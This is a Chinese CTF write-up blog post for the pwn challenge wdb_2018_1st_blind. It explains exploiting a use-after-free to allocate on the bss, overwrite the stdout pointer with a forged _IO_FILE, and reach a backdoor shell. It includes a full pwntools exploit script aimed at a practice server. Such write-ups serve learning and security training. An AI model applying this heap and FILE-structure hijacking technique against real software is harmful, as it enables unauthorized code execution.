wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数)

最新推荐文章于 2022-01-20 20:15:00 发布
最新推荐文章于 2022-01-20 20:15:00 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 UAF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106676901
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

wdb_2018_1st_blind(劫持bss段上的stdout指针来执行任意函数)

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,程序里没有show功能

有一个后门函数

Delete功能存在UAF,但是delete功能只能用3次,因此劫持_IO_2_1_stdout来泄露libc地址次数不够用。

由于got表也不可写,那么我们可以劫持bss段上的stdout指针,将其指向我们伪造的_IO_FILE结构体处,就可以调用backdoor函数了。

#coding:utf8
from pwn import *

#sh = process('./wdb_2018_1st_blind')
sh = remote('node3.buuoj.cn',29314)
backdoor = 0x00000000004008E3

def add(index,content):
   sh.sendlineafter('Choice:','1')
   sh.sendlineafter('Index:',str(index))
   sh.sendlineafter('Content:',content)

def edit(index,content):
   sh.sendlineafter('Choice:','2')
   sh.sendlineafter('Index:',str(index))
   sh.sendlineafter('Content:',content)

def delete(index):
   sh.sendlineafter('Choice:','3')
   sh.sendlineafter('Index:',str(index))

fake_chunk_in_bss = 0x0000000000601FF5
add(0,'a'*0x60) #0
delete(0)
edit(0,p64(fake_chunk_in_bss))
add(1,'a'*0x60) #1
#伪造一个IO_FILE
payload = p64(fake_chunk_in_bss + 0xB)
payload += p64(0)
payload += p64(fake_chunk_in_bss + 0x10) #vtable
payload += '\x00'*0x3 + p64(fake_chunk_in_bss - 0x78) + p64(backdoor) + '\x00'*0x25 + p64(0x601FF0)
add(2,payload) #申请到bss上,篡改stdout指针,伪造IO_FILE,当调用printf时,会getshell

sh.interactive()
ha1vk
关注
专栏目录
06 - matlab m_map地学绘图工具基础函数 - 绘制海岸线
weixin_43339605的博客
06-24 1460
本篇介绍了m_map中添加绘制海岸线的一系列函数及其用法,主要函数包括m_coast、m_gshhs、m_gshhs_c、m_gshhs_I、m_gshhs_i、m_gshhs_h、m_gshhs_f 和m_shaperead,还有一些函数也和绘制海岸线有关(如:m_plotbndry、m_usercoast),但没有合适的数据,未完成调用测试,所以不进行展开。
(BUUCTFwdb_2018_1st_blind
最新发布
xy1458214551的博客
01-03 379
BUUCTFwdb_2018_1st_blind题解
【八芒星计划】 劫持_IO_2_1_stdout_泄露libc
carol2358的博客
09-02 1097
这一篇讲劫持_IO_2_1_stdout_泄露libc,应用在没有show的heap题里,首先申明,所有的都需要爆破,并且2.27由于tcache的存在使得2.27的劫持_IO_2_1_stdout_比2.23简单 文章目录CISCN2020 easyboxsmaj CISCN2020 easyboxs libc2.23 off by one+劫持_IO_2_1_stdout_ 有add和free add(0, 0x18, 'a') add(1, 0xf8, 'a') add(2, 0x68, 'a'
BUUCTF 2021-10-4 Pwn
m0_56897090的博客
10-04 431
文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffer overflow 0分析EXPXCTF-Mary_Morton分析EXPEXPgift分析EXPfishin
解析c中stdout与stderr容易忽视的一些细节
09-05
本篇文章是对在c语言中stdout与stderr容易忽视的一些细节进行了详细的分析介绍,需要的朋友参考下
RCTF2020_nowrite(libc_start_main的妙用+盲注)
seaaseesa的博客
06-11 1464
RCTF2020_nowrite(libc_start_main的妙用+盲注) 首先,检查一下程序的保护机制 检测一下沙箱,发现仅能进行open、read、exit操作,write操作都不行。 然后,我们用IDA分析一下,是一个及其简短的栈溢出程序 程序中没有输出,并且write也禁用了,也没有open函数,execve也禁用了,FULL RELRO也不能进行ret2dl,那么本题只能进行盲注,我们还需要构造出一个open系统调用。但是几乎没有可用的地方可以给我们构造。 找到一条有用的
WDB.zip_vxworks WDB组件_vxworks wdb_wdb
09-22
1. **远程调试**:WDB允许开发者通过网络或串口与目标设备进行通信,实现在主机上对目标设备上的VxWorks应用程序进行调试,极大地提高了调试效率和便利性。 2. **多线程支持**:在实时系统中,多线程并发运行是常态...
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 440
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
wdb_graphql
03-15
Selenium Web Scraping脚本(在找到)使用该API来存储和更新数据库中的数据。 由于这只是概念的证明,因此使用内部django sqlite3数据库存储数据。 安装 复制资料库 git clone ...
Leader统帅KFR-72LW_02WDB81TU1空调说明书.pdf
02-13
Leader统帅品牌说明书
广联达582驱动-全国版写锁
06-12
最新的广联达写锁,亲测非常好用。
VxWorks 6.9 内核编程指导之读书笔记 -- 多任务(二)
weixin_30284355的博客
09-28 436
VxWorks的系统任务 VxWorks在引导时启动的系统任务依赖于配置,有些总是运行。任务集与VxWorks的基本配置相关,很少的任务常用于可选的组件。 注意:别挂起、删除或改变任何系统任务的优先级。否则将导致不可预期的系统行为。 基本VxWorks任务 Root Task 任务名称 tRootTask 优先级 0 ...
WDB in VxWorks
weixin_30848775的博客
07-19 655
The VxWorks WDB(Wind DeBug) target agent is a target-resident, run-time facility that is required for connecting host tools to a VxWorks target system. The WDB agent contains a compact implementat...
[BUUCTF-pwn] wdb_2018_1st_EasyCoin
weixin_52640415的博客
01-20 1955
原版的exp是这网鼎杯-EasyCoin | e3pem's Blog 看了半天好不容易弄明白。 漏洞点有两个,第1个比较容易,登录后输入4个字符不在菜单里的就直接printf,不过就4位也干不了嘛。把0-9都试一遍找到3和9分别是libc.write+0x10和heap_base+0x10也算是有用 default: printf("[-] Unknown Command: "); printf(buf); ..
[_IO_FILE] 原理解析
huzai9527的博客
11-10 3716
FSOP CFF-WIKI中有如下描述 FSOP 的核心思想就是劫持_IO_list_all 的值来伪造链表和其中的_IO_FILE 项,但是单纯的伪造只是构造了数据还需要某种方法进行触发。FSOP 选择的触发方法是调用_IO_flush_all_lockp,这个函数会刷新_IO_list_all 链表中所有项的文件流,相当于对每个 FILE 调用 fflush,也对应着会调用_IO_FILE_plus.vtable 中的_IO_overflow。 触发条件 梳理一下 FSOP 利用的条件,首先需
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1331
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
VxWorks中文FAQ
热门推荐
嵌入式软件
03-14 1万+
前言(Surface):随着国内使用VxWorks的用户越来越多,为了方便VxWorkers少走一些弯路,特别推出了中文FAQ,其中很多的FAQ来自comp.os.vxworks和原创。(很多FAQ都可以在该新闻组找到英文版)文档的FAQ总共分为7大类:1.入门FAQ2.Tornado工具FAQ3.BSP FAQ4.文件系统 FAQ5.网络 FAQ6.VxWor
buuctf (网鼎杯)wdb_2018_3rd_pesp realloc_hook, unlink,写入bss3种方法记录
carol2358的博客
05-14 1288
写了一道2018网鼎的heap,漏洞挺多,尝试了3中方法解题,也算是对目前heap的学习进度的总结吧 题目本身是一道常规heap题,pie和got保护都没开,可以改写got表 ①realloc_hook的做法: 先贴exp,然后慢慢解释 exp: from pwn import * from LibcSearcher import * local_file = './wdb_2018_3rd_pesp' local_libc = '/lib/x86_64-linux-gnu/libc-2.23
怎么把vivao2018.2波形生成的WDB文件导出来
03-29
要将Vivado 2018.2波形生成的WDB文件导出,请按照以下步骤进行操作: 1. 在Vivado中打开波形文件。 2. 点击“File”菜单并选择“Write Waveform Data”。 3. 在弹出的“Write Waveform Data File”对话框中,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值